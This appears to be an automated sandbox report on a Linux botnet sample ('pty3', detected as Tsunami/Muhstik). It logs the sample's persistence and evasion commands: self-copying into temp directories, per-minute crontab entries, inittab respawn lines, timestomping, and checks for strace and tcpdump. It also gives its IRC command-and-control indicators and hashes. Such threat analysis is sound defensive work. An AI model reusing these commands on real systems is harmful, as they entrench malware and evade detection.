Source: /bin/sh (PID: 5324)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5344)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior

Executes the "crontab" command typically for achieving persistence

Show sources

Source: /bin/sh (PID: 5245)	Crontab executable: /usr/bin/crontab -> crontab -r	Jump to behavior
Source: /bin/sh (PID: 5242)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5252)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5251)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5268)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5275)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5274)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5290)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5296)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5295)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5310)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5318)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5317)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5332)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5338)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5337)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior

Source: /usr/bin/cp (PID: 5263)	File written: /dev/shm/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5284)	File written: /var/tmp/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5304)	File written: /run/lock/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5326)	File written: /run/pty3	Jump to dropped file

Source: /bin/sh (PID: 5244)	Grep executable: /usr/bin/grep -> grep /tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5246)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5243)	Grep executable: /usr/bin/grep -> grep -v /tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5269)	Grep executable: /usr/bin/grep -> grep /dev/shm/pty3	Jump to behavior
Source: /bin/sh (PID: 5270)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5272)	Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty3	Jump to behavior
Source: /bin/sh (PID: 5291)	Grep executable: /usr/bin/grep -> grep /var/tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5292)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5289)	Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5311)	Grep executable: /usr/bin/grep -> grep /var/lock/pty3	Jump to behavior
Source: /bin/sh (PID: 5312)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5309)	Grep executable: /usr/bin/grep -> grep -v /var/lock/pty3	Jump to behavior
Source: /bin/sh (PID: 5333)	Grep executable: /usr/bin/grep -> grep /var/run/pty3	Jump to behavior
Source: /bin/sh (PID: 5334)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5331)	Grep executable: /usr/bin/grep -> grep -v /var/run/pty3	Jump to behavior

Source: /usr/bin/crontab (PID: 5251)	Crontab like entry written: /var/spool/cron/crontabs/tmp.l3d2Df	Jump to dropped file
Source: /usr/bin/crontab (PID: 5274)	Crontab like entry written: /var/spool/cron/crontabs/tmp.OnJidY	Jump to dropped file
Source: /usr/bin/crontab (PID: 5295)	Crontab like entry written: /var/spool/cron/crontabs/tmp.u6tmyy	Jump to dropped file
Source: /usr/bin/crontab (PID: 5317)	Crontab like entry written: /var/spool/cron/crontabs/tmp.pRPXld	Jump to dropped file
Source: /usr/bin/crontab (PID: 5337)	Crontab like entry written: /var/spool/cron/crontabs/tmp.qQwB9I	Jump to dropped file

Source: /tmp/pty3 (PID: 5229)	Shell command executed: sh -c "pidof -x strace > /dev/null"	Jump to behavior
Source: /tmp/pty3 (PID: 5232)	Shell command executed: sh -c "pidof -x tcpdump > /dev/null"	Jump to behavior
Source: /tmp/pty3 (PID: 5239)	Shell command executed: sh -c "crontab -r"	Jump to behavior
Source: /tmp/pty3 (PID: 5240)	Shell command executed: sh -c "crontab -l \| grep /tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5238)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/tmp/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5249)	Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5253)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5255)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5257)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5261)	Shell command executed: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5267)	Shell command executed: sh -c "crontab -l \| grep /dev/shm/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5266)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5276)	Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5277)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5279)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5281)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5283)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5287)	Shell command executed: sh -c "crontab -l \| grep /var/tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5286)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5293)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5297)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5299)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5301)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5303)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/lock/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5307)	Shell command executed: sh -c "crontab -l \| grep /var/lock/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5306)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5315)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5319)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5321)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5323)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5325)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/run/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5329)	Shell command executed: sh -c "crontab -l \| grep /var/run/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5328)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/run/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5335)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5339)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5341)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5343)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5262)	Shell command executed: sh -c "/bin/uname -n"	Jump to behavior

Source: /bin/sh (PID: 5256)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5280)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5300)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5322)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5342)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior

Source: /bin/sh (PID: 5258)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5282)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5302)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5324)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5344)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior

Source: submitted sample

Stderr: cat: /etc/inittabno crontab for rootno crontab for root: No such file or directoryno crontab for root: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 35994 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 35994 -> 8080

Source: /bin/uname (PID: 5264)

Queries kernel information via 'uname':

Jump to behavior

Stealing of Sensitive Information:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

Remote Access Functionality:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job11	Scheduled Task/Job11	Scheduled Task/Job11	Scripting1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	At (Linux)1	At (Linux)1	Timestomp1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)1	Logon Script (Windows)	Logon Script (Windows)	Indicator Removal on Host1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pty3	52%	Virustotal		Browse
pty3	32%	Metadefender		Browse
pty3	51%	ReversingLabs	Linux.Trojan.Tsunami

Dropped Files

Source	Detection	Scanner	Label	Link
/dev/shm/pty3	32%	Metadefender		Browse
/dev/shm/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami
/run/lock/pty3	32%	Metadefender		Browse
/run/lock/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
l.deutschland-zahlung.net	unknown	unknown	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
144.172.71.180	unknown	United States	397031	GALAXYGATEUS	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Runtime Messages

Command:	/tmp/pty3
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	cat: /etc/inittabno crontab for root no crontab for root : No such file or directory no crontab for root

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
144.172.71.180	pty4	Get hash	malicious	Browse
109.202.202.202	o5D7P3cFoh	Get hash	malicious	Browse
	febr6p6GS0	Get hash	malicious	Browse
	iEqdCaI7hq	Get hash	malicious	Browse
	QcYQNpoWaY	Get hash	malicious	Browse
	m-i.p-s.Sakura	Get hash	malicious	Browse
	ARIjSSIuyK	Get hash	malicious	Browse
	m-p.s-l.Sakura	Get hash	malicious	Browse
	tlGqgP841X	Get hash	malicious	Browse
	JuY9v1UT0h	Get hash	malicious	Browse
	uvnhFV6iPP	Get hash	malicious	Browse
	37pUsGRJV4	Get hash	malicious	Browse
	Nwh16sRNDk	Get hash	malicious	Browse
	F7iI9c0iob	Get hash	malicious	Browse
	1HcCcctp3H	Get hash	malicious	Browse
	9Arzk8wEEo	Get hash	malicious	Browse
	x-8.6-.Sakura	Get hash	malicious	Browse
	p-p.c-.Sakura	Get hash	malicious	Browse
	m-6.8-k.Sakura	Get hash	malicious	Browse
	x-3.2-.Sakura	Get hash	malicious	Browse
	7notN3Y5XU	Get hash	malicious	Browse
91.189.91.43	o5D7P3cFoh	Get hash	malicious	Browse
	febr6p6GS0	Get hash	malicious	Browse
	iEqdCaI7hq	Get hash	malicious	Browse
	QcYQNpoWaY	Get hash	malicious	Browse
	m-i.p-s.Sakura	Get hash	malicious	Browse
	ARIjSSIuyK	Get hash	malicious	Browse
	m-p.s-l.Sakura	Get hash	malicious	Browse
	tlGqgP841X	Get hash	malicious	Browse
	JuY9v1UT0h	Get hash	malicious	Browse
	uvnhFV6iPP	Get hash	malicious	Browse
	37pUsGRJV4	Get hash	malicious	Browse
	Nwh16sRNDk	Get hash	malicious	Browse
	F7iI9c0iob	Get hash	malicious	Browse
	1HcCcctp3H	Get hash	malicious	Browse
	9Arzk8wEEo	Get hash	malicious	Browse
	x-8.6-.Sakura	Get hash	malicious	Browse
	p-p.c-.Sakura	Get hash	malicious	Browse
	m-6.8-k.Sakura	Get hash	malicious	Browse
	x-3.2-.Sakura	Get hash	malicious	Browse
	7notN3Y5XU	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CANONICAL-ASGB	o5D7P3cFoh	Get hash	malicious	Browse	91.189.91.42
	febr6p6GS0	Get hash	malicious	Browse	91.189.91.42
	iEqdCaI7hq	Get hash	malicious	Browse	91.189.91.42
	QcYQNpoWaY	Get hash	malicious	Browse	91.189.91.42
	m-i.p-s.Sakura	Get hash	malicious	Browse	91.189.91.42
	ARIjSSIuyK	Get hash	malicious	Browse	91.189.91.42
	m-p.s-l.Sakura	Get hash	malicious	Browse	91.189.91.42
	tlGqgP841X	Get hash	malicious	Browse	91.189.91.42
	JuY9v1UT0h	Get hash	malicious	Browse	91.189.91.42
	uvnhFV6iPP	Get hash	malicious	Browse	91.189.91.42
	37pUsGRJV4	Get hash	malicious	Browse	91.189.91.42
	Nwh16sRNDk	Get hash	malicious	Browse	91.189.91.42
	F7iI9c0iob	Get hash	malicious	Browse	91.189.91.42
	1HcCcctp3H	Get hash	malicious	Browse	91.189.91.42
	9Arzk8wEEo	Get hash	malicious	Browse	91.189.91.42
	x-8.6-.Sakura	Get hash	malicious	Browse	91.189.91.42
	p-p.c-.Sakura	Get hash	malicious	Browse	91.189.91.42
	m-6.8-k.Sakura	Get hash	malicious	Browse	91.189.91.42
	x-3.2-.Sakura	Get hash	malicious	Browse	91.189.91.42
	7notN3Y5XU	Get hash	malicious	Browse	91.189.91.42
GALAXYGATEUS	pty4	Get hash	malicious	Browse	144.172.71.180
GALAXYGATEUS	Hilix.x86	Get hash	malicious	Browse	144.172.75.77
INIT7CH	o5D7P3cFoh	Get hash	malicious	Browse	109.202.202.202
	febr6p6GS0	Get hash	malicious	Browse	109.202.202.202
	iEqdCaI7hq	Get hash	malicious	Browse	109.202.202.202
	QcYQNpoWaY	Get hash	malicious	Browse	109.202.202.202
	m-i.p-s.Sakura	Get hash	malicious	Browse	109.202.202.202
	ARIjSSIuyK	Get hash	malicious	Browse	109.202.202.202
	m-p.s-l.Sakura	Get hash	malicious	Browse	109.202.202.202
	tlGqgP841X	Get hash	malicious	Browse	109.202.202.202
	JuY9v1UT0h	Get hash	malicious	Browse	109.202.202.202
	uvnhFV6iPP	Get hash	malicious	Browse	109.202.202.202
	37pUsGRJV4	Get hash	malicious	Browse	109.202.202.202
	Nwh16sRNDk	Get hash	malicious	Browse	109.202.202.202
	F7iI9c0iob	Get hash	malicious	Browse	109.202.202.202
	1HcCcctp3H	Get hash	malicious	Browse	109.202.202.202
	9Arzk8wEEo	Get hash	malicious	Browse	109.202.202.202
	x-8.6-.Sakura	Get hash	malicious	Browse	109.202.202.202
	p-p.c-.Sakura	Get hash	malicious	Browse	109.202.202.202
	m-6.8-k.Sakura	Get hash	malicious	Browse	109.202.202.202
	x-3.2-.Sakura	Get hash	malicious	Browse	109.202.202.202
	7notN3Y5XU	Get hash	malicious	Browse	109.202.202.202

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/dev/shm/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48964
Entropy (8bit):	7.872626881117998
Encrypted:	false
SSDEEP:	768:M02iLxh+reNihi1th2C8k+glPiDtQzUk5MZpbwMraJl7nyIsrJPudcNm9d/sjucW:M01Pe2XggtWtQQk5MZpB+l7nYrEdc89Z
MD5:	12CEDF7CD63208EE8FD9D0359637C46C
SHA1:	6C376C3A9D7811100E0C470FC3D4D05DE06FB30B
SHA-256:	4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720
SHA-512:	53C97FDFD5299B92CA91FA2D4F0899C3535C587AEAC3C49D05676270FED64C771369D65E74BB26E3519C3190A83FE3FFE3120B8FFD3F66CD3AAAED9F97B38F35
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@...................................................................P.......P.Q.....P.Q............................./l......l...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..D....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/etc/inittab Download File
Process:	/usr/bin/cat
File Type:	ASCII text
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.326664977926882
Encrypted:	false
SSDEEP:	3:IQfXzstFXzsm3V9vtXzsqsRFXzsqjKYAXzsqG:IQo37uTR
MD5:	5FF9D0108FCFD3FE6D507A5C71471FF7
SHA1:	DC713D40F4F57F8C428C4E69D8773CE4BAA39299
SHA-256:	BF7A744DCB866FE6C59F07C77D2B579C84B057F79321028B6B45320E4F6A2EED
SHA-512:	FFCA8F8BAC306F7910A8D62AB68083AE78206BDBB7EFCD4AAEB5BBF7A0BB56841FA70E359DAF3954912C649779E409284C40E5AD3C7E562FE04C359C038BB834
Malicious:	true
Reputation:	low
Preview:	0:2345:respawn:/tmp/pty3.0:2345:respawn:/dev/shm/pty3.0:2345:respawn:/var/tmp/pty3.0:2345:respawn:/var/lock/pty3.0:2345:respawn:/var/run/pty3.

/etc/inittab2 Download File
Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.090234012145145
Encrypted:	false
SSDEEP:	3:IQfXzsqG:IQK
MD5:	56FB9AFECF429F855832A7B43D82F4A4
SHA1:	9C516C4B773BC052FA25BD26AAFB34232BEFF257
SHA-256:	2DF88CC9DB68E3E385BC0790FDAC424B8C0E81BED9E562FD82CCBF7C84680E78
SHA-512:	A5F505C6E94F158859D8559D2BEEB4DA1106B3F6260E2B2ABD16630BBB6A218CE2E832EFB69F8C45F0B8413BF2BF645BC64D855738E0D2C63F5A034873363DB5
Malicious:	false
Reputation:	low
Preview:	0:2345:respawn:/var/run/pty3.

/run/lock/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48964
Entropy (8bit):	7.872626881117998
Encrypted:	false
SSDEEP:	768:M02iLxh+reNihi1th2C8k+glPiDtQzUk5MZpbwMraJl7nyIsrJPudcNm9d/sjucW:M01Pe2XggtWtQQk5MZpB+l7nYrEdc89Z
MD5:	12CEDF7CD63208EE8FD9D0359637C46C
SHA1:	6C376C3A9D7811100E0C470FC3D4D05DE06FB30B
SHA-256:	4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720
SHA-512:	53C97FDFD5299B92CA91FA2D4F0899C3535C587AEAC3C49D05676270FED64C771369D65E74BB26E3519C3190A83FE3FFE3120B8FFD3F66CD3AAAED9F97B38F35
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
